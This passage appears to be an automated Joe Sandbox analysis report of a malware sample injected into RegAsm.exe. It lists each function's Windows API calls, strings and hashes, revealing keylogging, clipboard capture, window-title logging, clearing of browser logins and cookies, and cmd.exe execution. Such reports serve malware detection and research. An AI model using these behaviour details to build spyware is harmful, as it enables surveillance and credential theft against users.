                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                          • API String ID: 3628047217-1405518554
                                                                                                                                                                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                                                                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                                                                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                                                                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                                                                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                                                                                                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                                          • API String ID: 186401046-604454484
                                                                                                                                                                                          • Opcode ID: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                                                                                                                                                                                          • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                                                                                                                          • Opcode Fuzzy Hash: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecuteShell
                                                                                                                                                                                          • String ID: /C $cmd.exe$open
                                                                                                                                                                                          • API String ID: 587946157-3896048727
                                                                                                                                                                                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: GetCursorInfo$User32.dll
                                                                                                                                                                                          • API String ID: 1646373207-2714051624
                                                                                                                                                                                          • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                                                          • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                                                                                                          • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                          • API String ID: 2574300362-1519888992
                                                                                                                                                                                          • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                                                          • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                                                          • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                                                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                                                                                                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                                                                                          • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                                                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                                                                                                          • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                          • API String ID: 3472027048-1236744412
                                                                                                                                                                                          • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                                                                          • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                                                                                                                          • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                                                                                                                          • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                                                                                                                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                                                                                                                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1432082543-0
                                                                                                                                                                                          • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                                                                          • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                                                                                                                          • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                                                                          • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                                                                                                                                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                                                                                                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                          • String ID: [ $ ]
                                                                                                                                                                                          • API String ID: 3309952895-93608704
                                                                                                                                                                                          • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                                                                                                          • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                                                                                                                                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                                                                                                                                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                                                                                                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                                                                                                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2633735394-0
                                                                                                                                                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4116985748-0
                                                                                                                                                                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                                          • String ID: pow
                                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                                          • API String ID: 1881088180-3686566968
                                                                                                                                                                                          • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                                                                          • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                                                                          • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                          • API String ID: 0-711371036
                                                                                                                                                                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
